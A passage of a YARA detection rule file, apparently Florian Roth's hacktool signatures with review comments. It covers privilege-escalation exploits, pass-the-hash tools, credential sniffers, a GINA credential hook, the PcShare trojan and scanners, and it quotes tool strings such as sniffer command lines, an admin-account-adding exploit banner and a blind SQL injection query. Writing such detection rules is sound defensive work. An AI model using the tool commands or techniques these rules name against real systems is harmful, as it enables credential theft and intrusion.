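		$s3 = "explorer.exe http://www.hackdos.com" fullword ascii
		$s4 = "C:\\WINDOWS\\temp\\pojie.exe" fullword ascii
		$s5 = "Failed to read file or invalid data in file!" fullword ascii
		$s6 = "www.hackdos.com" fullword ascii
		$s7 = "WTNE / MADE BY E COMPILER - WUTAO " fullword ascii
		$s11 = "The interface of kernel library is invalid!" fullword ascii
		$s12 = "eventvwr" fullword ascii
		$s13 = "Failed to decompress data!" fullword ascii
		$s14 = "NOTEPAD.EXE result.txt" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 8000KB and 4 of them
}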
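// ms11011.exe - local privilege-escalation exploit binary (MS11-011). Only the PDB
// path $s0 and $s1 are specific; $s3/$s4 are goodware strings that add little.
// All four required, MZ and < 100KB.
rule GoodToolset_ms11011 {
	meta:
		description = "Chinese Hacktool Set - file ms11011.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386"
	strings:
		$s0 = "\\i386\\Hello.pdb" ascii
		$s1 = "OS not supported." fullword ascii
		$s3 = "Not supported." fullword wide  /* Goodware String - occured 3 times */
		$s4 = "SystemDefaultEUDCFont" fullword wide  /* Goodware String - occured 18 times */
	condition:
		uint16(0) == 0x5a4d and filesize < 100KB and all of them
}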
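// SSClone sniffer / session-clone tool: matched by a promotional URL, the product DLL
// name and a file-dialog filter string. All four required, MZ and < 3580KB.
rule Sniffer_analyzer_SSClone_1210_full_version {
	meta:
		description = "Chinese Hacktool Set - file Sniffer analyzer SSClone 1210 full version.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "6882125babb60bd0a7b2f1943a40b965b7a03d4e"
	strings:
		$s0 = "http://www.vip80000.com/hot/index.html" fullword ascii
		$s1 = "GetConnectString" fullword ascii
		$s2 = "CnCerT.Safe.SSClone.dll" fullword ascii
		$s3 = "(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 3580KB and all of them
}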
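// HScan GUI (cnhonker): FTP account-cracking result messages. 2 of 4 with MZ and
// < 220KB; $s2 is just the project URL, so $s1/$s3/$s4 are the meaningful ones.
rule hscangui {
	meta:
		description = "Chinese Hacktool Set - file hscangui.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "af8aced0a78e1181f4c307c78402481a589f8d07"
	strings:
		$s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" fullword ascii
		$s2 = "http://www.cnhonker.com" fullword ascii
		$s3 = "%s@ftpscan#Cracked account:  %s/%s" fullword ascii
		$s4 = "[%s]: Found \"FTP account: %s/%s\" !!!" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 220KB and 2 of them
}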
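// Install.exe from the WinEggDropShell archive. Every string points at an "S-Player"
// / sdemo media player (163.com, 263.net, BaiXue.net) rather than at the shell, so the
// rule appears to match the carrier the archive shipped with; expect hits on clean
// copies of that player. No MZ or filesize gate.
rule Jc_ALL_WinEggDropShell_rar_Folder_Install_2 {
	meta:
		description = "Disclosed hacktool set (old stuff) - file Install.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "95866e917f699ee74d4735300568640ea1a05afd"
	strings:
		$s1 = "http://go.163.com/sdemo" fullword wide
		$s2 = "Player.tmp" fullword ascii
		$s3 = "Player.EXE" fullword wide
		$s4 = "mailto:sdemo@263.net" fullword ascii
		$s5 = "S-Player.exe" fullword ascii
		$s9 = "http://www.BaiXue.net (" fullword wide
	condition:
		all of them
}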
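// IISPutScanner.exe. None of the strings names the tool: $s2-$s22 are DLL/import
// names and $s23-$s33 look like stock Delphi VCL resource names (BB* button glyphs,
// TFORM1, MAINICON). The rule therefore describes "a Delphi-built PE between 350KB and
// 500KB with these imports"; confirm hits against the meta hash or another rule
// before acting on them.
rule IISPutScanner {
	meta:
		description = "Chinese Hacktool Set - file IISPutScanner.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "9869c70d6a9ec2312c749aa17d4da362fa6e2592"
	strings:
		$s2 = "KERNEL32.DLL" fullword ascii
		$s3 = "ADVAPI32.DLL" fullword ascii
		$s4 = "VERSION.DLL" fullword ascii
		$s5 = "WSOCK32.DLL" fullword ascii
		$s6 = "COMCTL32.DLL" fullword ascii
		$s7 = "GDI32.DLL" fullword ascii
		$s8 = "SHELL32.DLL" fullword ascii
		$s9 = "USER32.DLL" fullword ascii
		$s10 = "OLEAUT32.DLL" fullword ascii
		$s11 = "LoadLibraryA" fullword ascii
		$s12 = "GetProcAddress" fullword ascii
		$s13 = "VirtualProtect" fullword ascii
		$s14 = "VirtualAlloc" fullword ascii
		$s15 = "VirtualFree" fullword ascii
		$s16 = "ExitProcess" fullword ascii
		$s17 = "RegCloseKey" fullword ascii
		$s18 = "GetFileVersionInfoA" fullword ascii
		$s19 = "ImageList_Add" fullword ascii
		$s20 = "BitBlt" fullword ascii
		$s21 = "ShellExecuteA" fullword ascii
		$s22 = "ActivateKeyboardLayout" fullword ascii
		$s23 = "BBABORT" fullword wide
		$s25 = "BBCANCEL" fullword wide
		$s26 = "BBCLOSE" fullword wide
		$s27 = "BBHELP" fullword wide
		$s28 = "BBIGNORE" fullword wide
		$s29 = "PREVIEWGLYPH" fullword wide
		$s30 = "DLGTEMPLATE" fullword wide
		$s31 = "TABOUTBOX" fullword wide
		$s32 = "TFORM1" fullword wide
		$s33 = "MAINICON" fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 500KB and filesize > 350KB and all of them
}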
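// DuBrute brute forcer. $b-$e are ordinary output file names that many tools use;
// $a and $f carry the specificity, and all six are required together with the MZ
// check. Strings have no modifiers (ASCII, non-fullword).
rule dubrute : bruteforcer toolkit
{
    meta:
        author = "Christian Rebischke (@sh1bumi)"
        date = "2015-09-05"
        description = "Rules for DuBrute Bruteforcer"
        in_the_wild = true
        family = "Hackingtool/Bruteforcer"

    strings:
        $a = "WBrute"
        $b = "error.txt"
        $c = "good.txt"
        $d = "source.txt"
        $e = "bad.txt"
        $f = "Generator IP@Login;Password"

    condition:
        //check for MZ Signature at offset 0
        uint16(0) == 0x5A4D

        and

        //check for dubrute specific strings
        $a and $b and $c and $d and $e and $f
}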
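// Amplia Security / Core tools (WCE, pass-the-hash toolkit). "1 of them" with no MZ
// or filesize gate means the vendor name ($a) or the author's name ($b) alone fires -
// including on reports, READMEs and rule files that quote them (the whosthere_alt
// rule in this set embeds "Hernan Ochoa" in $s0). $e duplicates $a of
// WindowsCredentialEditor. Consider gating $a/$b behind a PE check or a second string.
rule Amplia_Security_Tool
{
    meta:
		description = "Amplia Security Tool"
		score = 60
		nodeepdive = 1
    strings:
		$a = "Amplia Security"
		$b = "Hernan Ochoa"
		$c = "getlsasrvaddr.exe"
		$d = "Cannot get PID of LSASS.EXE"
		$e = "extract the TGT session key"
		$f = "PPWDUMP_DATA"
    condition: 1 of them
}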
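// oncrpc.dll bundled with HScan v1.20. The strings are generic ONC RPC library
// diagnostics (clnt_raw.c, svctcp_.c, bindresvport.c), so any product that ships an
// ONC RPC port for Windows can satisfy 4 of 5. Treat a hit as "toolset component
// present", not as proof of HScan; the meta hash pins the exact build.
rule HScan_v1_20_oncrpc {
	meta:
		description = "Chinese Hacktool Set - file oncrpc.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "e8f047eed8d4f6d2f5dbaffdd0e6e4a09c5298a2"
	strings:
		$s1 = "clnt_raw.c - Fatal header serialization error." fullword ascii
		$s2 = "svctcp_.c - cannot getsockname or listen" fullword ascii
		$s3 = "too many connections (%d), compilation constant FD_SETSIZE was only %d" fullword ascii
		$s4 = "svc_run: - select failed" fullword ascii
		$s5 = "@(#)bindresvport.c" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 340KB and 4 of them
}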
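// PipeCmd.exe / PipeCmdSrv.exe - a psexec-style remote shell: named-pipe name formats
// ($s4, $s5, $s13) and the ADMIN$\System32 service-binary drop paths ($s6, $s7).
// 4 of 11, no MZ gate (the same strings identify both the client and the service).
rule CN_Toolset_NTscan_PipeCmd {
	meta:
		description = "Detects a Chinese hacktool from a disclosed toolset - file PipeCmd.exe"
		author = "Florian Roth"
		reference = "http://qiannao.com/ls/905300366/33834c0c/"
		reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
		date = "2015/03/30"
		score = 70
		hash = "a931d65de66e1468fe2362f7f2e0ee546f225c4e"
	strings:
		$s2 = "Please Use NTCmd.exe Run This Program." fullword ascii
		$s3 = "PipeCmd.exe" fullword wide
		$s4 = "\\\\.\\pipe\\%s%s%d" fullword ascii
		$s5 = "%s\\pipe\\%s%s%d" fullword ascii
		$s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii
		$s7 = "%s\\ADMIN$\\System32\\%s" fullword ascii
		$s9 = "PipeCmdSrv.exe" fullword ascii
		$s10 = "This is a service executable! Couldn't start directly." fullword ascii
		$s13 = "\\\\.\\pipe\\PipeCmd_communicaton" fullword ascii
		$s14 = "PIPECMDSRV" fullword wide
		$s15 = "PipeCmd Service" fullword ascii
	condition:
		4 of them
}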
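// SQLCracker.exe (VB6). $s0-$s2 are present in essentially every VB6 binary and $s4
// is a version-resource language block (0804 = zh-CN LANGID, 04B0 = Unicode code
// page) shared by all Chinese-locale VB6 programs, so the only sample-specific token
// is $s3 "cKmhV"; the MZ + < 125KB gate does the rest. Expect a brittle signature.
rule SQLCracker {
	meta:
		description = "Chinese Hacktool Set - file SQLCracker.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "1aa5755da1a9b050c4c49fc5c58fa133b8380410"
	strings:
		$s0 = "msvbvm60.dll" fullword ascii /* reversed goodware string 'lld.06mvbvsm' */
		$s1 = "_CIcos" fullword ascii
		$s2 = "kernel32.dll" fullword ascii
		$s3 = "cKmhV" fullword ascii
		$s4 = "080404B0" fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 125KB and all of them
}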
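// cyclotron.sys - tiny kernel driver exposing the \Device\IDTProt device; $s2/$s4/$s5
// are standard driver-model imports and $s1/$s3 the specific names. "filesize < 3KB"
// is very tight: a rebuilt or differently linked driver will fall outside it.
rule cyclotron {
	meta:
		description = "Chinese Hacktool Set - file cyclotron.sys"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "5b63473b6dc1e5942bf07c52c31ba28f2702b246"
	strings:
		$s1 = "\\Device\\IDTProt" fullword wide
		$s2 = "IoDeleteSymbolicLink" fullword ascii  /* Goodware String - occured 467 times */
		$s3 = "\\??\\slIDTProt" fullword wide
		$s4 = "IoDeleteDevice" fullword ascii  /* Goodware String - occured 993 times */
		$s5 = "IoCreateSymbolicLink" fullword ascii /* Goodware String - occured 467 times */
	condition:
		uint16(0) == 0x5a4d and filesize < 3KB and all of them
}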
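// =Bitchin Threads=.exe. The meta hash is an MD5 (32 hex digits) where the rest of
// the set uses SHA-1; strings carry no modifiers (ASCII, non-fullword) and there is no
// MZ gate, so both tokens are required to stay specific.
rule _Bitchin_Threads_ {
	meta:
		description = "Auto-generated rule on file =Bitchin Threads=.exe"
		author = "yarGen Yara Rule Generator by Florian Roth"
		hash = "7491b138c1ee5a0d9d141fbfd1f0071b"
	strings:
		$s0 = "DarKPaiN"
		$s1 = "=BITCHIN THREADS"
	condition:
		all of them
}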
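// ipscan.exe from FeliksPack3. The strings ("WCAP;}ECTED", "SCAN.VERSION{_") look
// like fragments of compressed or packed data; they pin this exact build but will
// not survive a repack. MD5 in meta, no MZ gate.
rule FeliksPack3___Scanners_ipscan {
	meta:
		description = "Auto-generated rule on file ipscan.exe"
		author = "yarGen Yara Rule Generator by Florian Roth"
		hash = "6c1bcf0b1297689c8c4c12cc70996a75"
	strings:
		$s2 = "WCAP;}ECTED"
		$s4 = "NotSupported"
		$s6 = "SCAN.VERSION{_"
	condition:
		all of them
}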
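// Marathon Tool - blind SQL injection tool based on heavy queries ($s17). Matched on
// a default target URL, an Oracle probe query template and the description string;
// all three required, MZ and < 1000KB.
rule MarathonTool_2 {
	meta:
		description = "Chinese Hacktool Set - file MarathonTool.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "75b5d25cdaa6a035981e5a33198fef0117c27c9c"
	strings:
		$s3 = "http://localhost/retomysql/pista.aspx?id_pista=1" fullword wide
		$s6 = "SELECT ASCII(SUBSTR(username,{0},1)) FROM USER_USERS" fullword wide
		$s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 1000KB and all of them
}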
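// splitjoin.exe - Angus Johnson's file split/join utility. It is a benign tool that
// happened to be in the disclosed set; the rule matches every copy of the utility,
// so treat hits as "toolset artefact present", not as malware. No MZ gate.
rule splitjoin {
	meta:
		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "e4a9ef5d417038c4c76b72b5a636769a98bd2f8c"
	strings:
		$s0 = "Not for distribution without the authors permission" fullword wide
		$s2 = "Utility to split and rejoin files.0" fullword wide
		$s5 = "Copyright (c) Angus Johnson 2001-2002" fullword wide
		$s19 = "SplitJoin" fullword wide
	condition:
		all of them
}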
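// Cmdshell32.exe - command shell with a "[Root@CmdShell ~]#" prompt ($s3 is the
// telling string; $s1/$s2 are just the name). All three required, MZ and < 62KB.
rule Cmdshell32 {
	meta:
		description = "Chinese Hacktool Set - file Cmdshell32.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "3c41116d20e06dcb179e7346901c1c11cd81c596"
	strings:
		$s1 = "cmdshell.exe" fullword wide
		$s2 = "cmdshell" fullword ascii
		$s3 = "[Root@CmdShell ~]#" fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 62KB and all of them
}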
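rule sig_238_FPipe {
	// Foundstone FPipe, a legitimate dual-use TCP/UDP port redirector; strings are
	// taken from its help text. Expect hits on pentest and admin hosts; a hit on a
	// server is worth a look because it is the classic pivoting tool.
	meta:
		description = "Disclosed hacktool set (old stuff) - file FPipe.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
	strings:
		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
		$s2 = "source port for that outbound connection being set to 53 also." fullword ascii
		$s3 = " -s    - outbound source port number" fullword ascii
		$s5 = "http://www.foundstone.com" fullword ascii
		$s20 = "Attempting to connect to %s port %d" fullword ascii
	condition:
		all of them
}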
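rule IDTools_For_WinXP_IdtTool {
	// IDT (interrupt descriptor table) viewer that ships its own kernel driver
	// ($s2 .sys name, $s6 device path) - i.e. ring-0 capability. Treat a hit as
	// high interest; the 25KB size cap keeps it tight.
	meta:
		description = "Chinese Hacktool Set - file IdtTool.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "ebab6e4cb7ea82c8dc1fe4154e040e241f4672c6"
	strings:
		$s2 = "IdtTool.sys" fullword ascii
		$s4 = "Idt Tool bY tMd[CsP]" fullword wide
		$s6 = "\\\\.\\slIdtTool" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 25KB and all of them
}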
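rule IsDebug_V1_4 {
	// IsDebuggerPresent byte-patcher (anti-anti-debug helper from a cracking kit).
	// All eight strings are required, so FP risk is negligible.
	meta:
		description = "Chinese Hacktool Set - file IsDebug V1.4.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "ca32474c358b4402421ece1cb31714fbb088b69a"
	strings:
		$s0 = "IsDebug.dll" fullword ascii
		$s1 = "SV Dumper V1.0" fullword wide
		$s2 = "(IsDebuggerPresent byte Patcher)" fullword ascii
		$s8 = "Error WriteMemory failed" fullword ascii
		$s9 = "IsDebugPresent" fullword ascii
		$s10 = "idb_Autoload" fullword ascii
		$s11 = "Bin Files" fullword ascii
		$s12 = "MASM32 version" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 30KB and all of them
}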
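rule whosthere_alt_pth : Toolkit  {
	// Core Security Pass-The-Hash Toolkit DLL (whosthere-alt). $s0 and $s1 are
	// weak on their own; requiring 4 of 5 means at least two of the LSASS-search
	// debug messages ($s2-$s4) must also be present.
	meta:
		description = "Auto-generated rule - file pth.dll"
		author = "Florian Roth"
		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
		date = "2015-07-10"
		score = 80
		hash = "fbfc8e1bc69348721f06e96ff76ae92f3551f33ed3868808efdb670430ae8bd0"
	strings:
		$s0 = "c:\\debug.txt" fullword ascii /* PEStudio Blacklist: strings */ /* score: '23.00' */
		$s1 = "pth.dll" fullword ascii /* score: '20.00' */
		$s2 = "\"Primary\" string found at %.8Xh" fullword ascii /* score: '7.00' */
		$s3 = "\"Primary\" string not found!" fullword ascii /* score: '6.00' */
		$s4 = "segment 1 found at %.8Xh" fullword ascii /* score: '6.00' */
	condition:
		uint16(0) == 0x5a4d and filesize < 240KB and 4 of them
}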
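rule sig_238_TELNET {
	// NOTE(review): this identifies the genuine Microsoft Windows ME TELNET.EXE
	// (OS version text in $s4, product registry key in $s14) that was repackaged
	// in a hacktool kit. The binary itself is not malicious; the signal is its
	// presence on a host where a Windows ME telnet client has no business being.
	meta:
		description = "Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "50d02d77dc6cc4dc2674f90762a2622e861d79b1"
	strings:
		$s0 = "TELNET [host [port]]" fullword wide
		$s2 = "TELNET.EXE" fullword wide
		$s4 = "Microsoft(R) Windows(R) Millennium Operating System" fullword wide
		$s14 = "Software\\Microsoft\\Telnet" fullword wide
	condition:
		all of them
}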
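rule iKAT_revelations {
	// SnadBoy "Revelation" - a legitimate utility that reveals the text behind
	// password-masked edit controls; iKAT ships it for kiosk break-outs. Strings
	// are the vendor's support addresses and helper DLL name, so FP risk is low
	// but a hit is dual-use, not malware.
	meta:
		description = "iKAT hack tool showing the content of password fields - file revelations.exe"
		author = "Florian Roth"
		date = "05.11.14"
		score = 75
		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
		hash = "c4e217a8f2a2433297961561c5926cbd522f7996"
	strings:
		$s0 = "The RevelationHelper.DLL file is corrupt or missing." fullword ascii
		$s8 = "BETAsupport@snadboy.com" fullword wide
		$s9 = "support@snadboy.com" fullword wide
		$s14 = "RevelationHelper.dll" fullword ascii
	condition:
		all of them
}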
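rule Hacktools_CN_Panda_tesksd {
	// Downloader disguised with a .jpg extension. $s0 is the Common-Controls
	// manifest fragment present in almost every Windows GUI binary and carries no
	// signal by itself; $s1 (ExeMiniDownload.exe) and the POST format in $s16 do.
	// `all of them` is what keeps this from firing on ordinary executables.
	meta:
		description = "Disclosed hacktool set - file tesksd.jpg"
		author = "Florian Roth"
		date = "17.11.14"
		score = 60
		hash = "922147b3e1e6cf1f5dd5f64a4e34d28bdc9128cb"
	strings:
		$s0 = "name=\"Microsoft.Windows.Common-Controls\" " fullword ascii
		$s1 = "ExeMiniDownload.exe" fullword wide
		$s16 = "POST %Hs" fullword ascii
	condition:
		all of them
}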
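rule CN_Tools_PcShare {
	// PcShare remote-administration trojan. $s1 (a stock MSIE 6 User-Agent) and
	// $s16 are generic; the pcshare.cn/pcshares.cn URLs, pcinit.exe and the
	// "port=;name=;pass=" config format are the real indicators. 3 of 7 can be
	// met by generic strings alone only if $s1+$s16 pair with one more hit.
	meta:
		description = "Chinese Hacktool Set - file PcShare.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "ee7ba9784fae413d644cdf5a093bd93b73537652"
	strings:
		$s0 = "title=%s%s-%s;id=%s;hwnd=%d;mainhwnd=%d;mainprocess=%d;cmd=%d;" fullword wide
		$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide
		$s2 = "http://www.pcshares.cn/pcshare200/lostpass.asp" fullword wide
		$s5 = "port=%s;name=%s;pass=%s;" fullword wide
		$s16 = "%s\\ini\\*.dat" fullword wide
		$s17 = "pcinit.exe" fullword wide
		$s18 = "http://www.pcshare.cn" fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 6000KB and 3 of them
}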
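rule LinuxHacktool_eyes_pscan2_2 {
	// Matches the C *source* of pscan2 (a mass port scanner), not a compiled
	// binary. NOTE(review): $s19 is ordinary BSD socket code and could pair with
	// $s0's snprintf line in unrelated scanners; the usage text ($s2) and the
	// "pscan completed" banner ($s3) are the distinctive strings.
	meta:
		description = "Linux hack tools - file pscan2.c"
		author = "Florian Roth"
		reference = "not set"
		date = "2015/01/19"
		hash = "eb024dfb441471af7520215807c34d105efa5fd8"
	strings:
		$s0 = "snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);" fullword ascii
		$s2 = "printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);" fullword ascii
		$s3 = "printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - sca" ascii
		$s19 = "connlist[i].addr.sin_family = AF_INET;" fullword ascii
		$s20 = "snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\"," fullword ascii
	condition:
		2 of them
}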
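rule CN_Tools_xsniff {
	// xsniff (xfocus) credential sniffer; $s1 is its cleartext HOST/USER/PASS log
	// line. Same sample hash as rule sig_238_xsniff later in this set - both rules
	// fire on it; kept separately for provenance.
	meta:
		description = "Chinese Hacktool Set - file xsniff.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "d61d7329ac74f66245a92c4505a327c85875c577"
	strings:
		$s0 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
		$s1 = "HOST: %s USER: %s, PASS: %s" fullword ascii
		$s2 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
		$s10 = "Code by glacier <glacier@xfocus.org>" fullword ascii
		$s11 = "%-5s%s->%s Bytes=%d TTL=%d Type: %d,%d ID=%d SEQ=%d" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 220KB and 2 of them
}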
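rule BypassUac2 {
	// Detects the BypassUac source archive by the project paths stored in plain
	// text in the zip directory. No archive magic check, so it also matches any
	// file listing or build log that contains all three paths.
	meta:
		description = "Auto-generated rule - file BypassUac2.zip"
		author = "yarGen Yara Rule Generator"
		hash = "ef3e7dd2d1384ecec1a37254303959a43695df61"
	strings:
		$s0 = "/BypassUac/BypassUac/BypassUac_Utils.cpp" fullword ascii
		$s1 = "/BypassUac/BypassUacDll/BypassUacDll.aps" fullword ascii
		$s3 = "/BypassUac/BypassUac/BypassUac.ico" fullword ascii
	condition:
		all of them
}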
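rule sig_238_token {
	// Token/logon enumeration tool. $s3 ("Process ") is generic and $s4 carries a
	// trailing 'K' from an adjacent string in the binary - an extraction artefact
	// that still matches the sample byte-for-byte. All five strings required.
	meta:
		description = "Disclosed hacktool set (old stuff) - file token.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "c52bc6543d4281aa75a3e6e2da33cfb4b7c34b14"
	strings:
		$s0 = "Logon.exe" fullword ascii
		$s1 = "Domain And User:" fullword ascii
		$s2 = "PID=Get Addr$(): One" fullword ascii
		$s3 = "Process " fullword ascii
		$s4 = "psapi.dllK" fullword ascii
	condition:
		all of them
}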
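rule GoodToolset_ms11080 {
	// MS11-080 local privilege escalation exploit that adds a local admin account
	// ("90sec"). The PDB path ($s2) and author tag ($s3) are the highest-confidence
	// strings; 2 of 6 required.
	meta:
		description = "Chinese Hacktool Set - file ms11080.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "f0854c49eddf807f3a7381d3b20f9af4a3024e9f"
	strings:
		$s1 = "[*] command add user 90sec 90sec" fullword ascii
		$s2 = "\\ms11080\\Debug\\ms11080.pdb" fullword ascii
		$s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii
		$s4 = "[*] Add to Administrators success" fullword ascii
		$s5 = "[*] User has been successfully added" fullword ascii
		$s6 = "[>] ms11-08 Exploit" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 240KB and 2 of them
}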
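rule ms11080_withcmd {
	// MS11-080 LPE variant that runs an arbitrary command as SYSTEM. `1 of them`
	// is acceptable here because every string is tool-specific (PDB path, usage,
	// author tag); the "porcess" typo in $s4 is part of the indicator - keep it.
	meta:
		description = "Chinese Hacktool Set - file ms11080_withcmd.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "745e5058acff27b09cfd6169caf6e45097881a49"
	strings:
		$s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii
		$s2 = "\\ms11080\\ms11080\\Debug\\ms11080.pdb" fullword ascii
		$s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii
		$s4 = "[>] create porcess error" fullword ascii
		$s5 = "[>] ms11-080 Exploit" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 300KB and 1 of them
}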
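rule PortRacer {
	// yarGen rule for the PortRacer GUI port scanner; strings are UI captions.
	// No MZ/filesize guard, but all three captions are required.
	meta:
		description = "Auto-generated rule on file PortRacer.exe"
		author = "yarGen Yara Rule Generator by Florian Roth"
		hash = "2834a872a0a8da5b1be5db65dfdef388"
	strings:
		$s0 = "Auto Scroll BOTH Text Boxes"
		$s4 = "Start/Stop Portscanning"
		$s6 = "Auto Save LogFile by pressing STOP"
	condition:
		all of them
}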
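rule gina_zip_Folder_gina {
	// GINA wrapper (credential-stealing replacement for msgina.dll). The Wlx*
	// exports ($s3,$s6,$s13,$s16) are the standard GINA interface and appear in
	// every legitimate GINA; $s14/$s17 are stock loader-stub error messages. The
	// discriminator is "NEWGINA.dll" ($s0), the name the wrapper chains to -
	// hence `all of them`.
	meta:
		description = "Disclosed hacktool set (old stuff) - file gina.dll"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "e0429e1b59989cbab6646ba905ac312710f5ed30"
	strings:
		$s0 = "NEWGINA.dll" fullword ascii
		$s1 = "LOADER ERROR" fullword ascii
		$s3 = "WlxActivateUserShell" fullword ascii
		$s6 = "WlxWkstaLockedSAS" fullword ascii
		$s13 = "WlxIsLockOk" fullword ascii
		$s14 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
		$s16 = "WlxShutdown" fullword ascii
		$s17 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
	condition:
		all of them
}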
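rule InstGina {
	// Installer for the GINA hook above: sets the Winlogon "GinaDLL" registry
	// value ($s5) to load the rogue DLL. $s4 is deliberately not `fullword`.
	meta:
		description = "Disclosed hacktool set (old stuff) - file InstGina.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "5317fbc39508708534246ef4241e78da41a4f31c"
	strings:
		$s0 = "To Open Registry" fullword ascii
		$s4 = "I love Candy very much!!" ascii
		$s5 = "GinaDLL" fullword ascii
	condition:
		all of them
}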
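rule update_PcMain {
	// PcShare service-side component: persists as an svchost-hosted service
	// ($s1, $s3, $s4) and hijacks the HTTP protocol handler ($s2).
	// NOTE(review): 4 of 12 with several generic strings ($s0 User-Agent,
	// $s10/$s14 "%d.exe", $s18 "GET / HTTP/1.1", $s19 "\\Services\\") - a benign
	// svchost-hosted service can satisfy four. If FPs show up, require $s20
	// (the qy001id beacon format) or raise the threshold rather than dropping
	// the rule.
	meta:
		description = "Chinese Hacktool Set - file PcMain.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "aa68323aaec0269b0f7e697e69cce4d00a949caa"
	strings:
		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322" ascii
		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii
		$s2 = "SOFTWARE\\Classes\\HTTP\\shell\\open\\command" fullword ascii
		$s3 = "\\svchost.exe -k " fullword ascii
		$s4 = "SYSTEM\\ControlSet001\\Services\\%s" fullword ascii
		$s9 = "Global\\%s-key-event" fullword ascii
		$s10 = "%d%d.exe" fullword ascii
		$s14 = "%d.exe" fullword ascii
		$s15 = "Global\\%s-key-metux" fullword ascii
		$s18 = "GET / HTTP/1.1" fullword ascii
		$s19 = "\\Services\\" fullword ascii
		$s20 = "qy001id=%d;qy001guid=%s" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 500KB and 4 of them
}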
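rule iam_alt_iam_alt : Toolkit  {
	// Core Security IAM-ALT: rewrites the NTLM credentials of the current logon
	// session by writing into LSASS ($s5, $s7) - pass-the-hash. The hash format
	// in $s3 is lowercase; it will not be matched by the mixed-case $v string of
	// rule HackTool_Samples (YARA strings are case-sensitive without `nocase`).
	meta:
		description = "Auto-generated rule - file iam-alt.exe"
		author = "Florian Roth"
		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
		date = "2015-07-10"
		score = 80
		hash = "2ea662ef58142d9e340553ce50d95c1b7a405672acdfd476403a565bdd0cfb90"
	strings:
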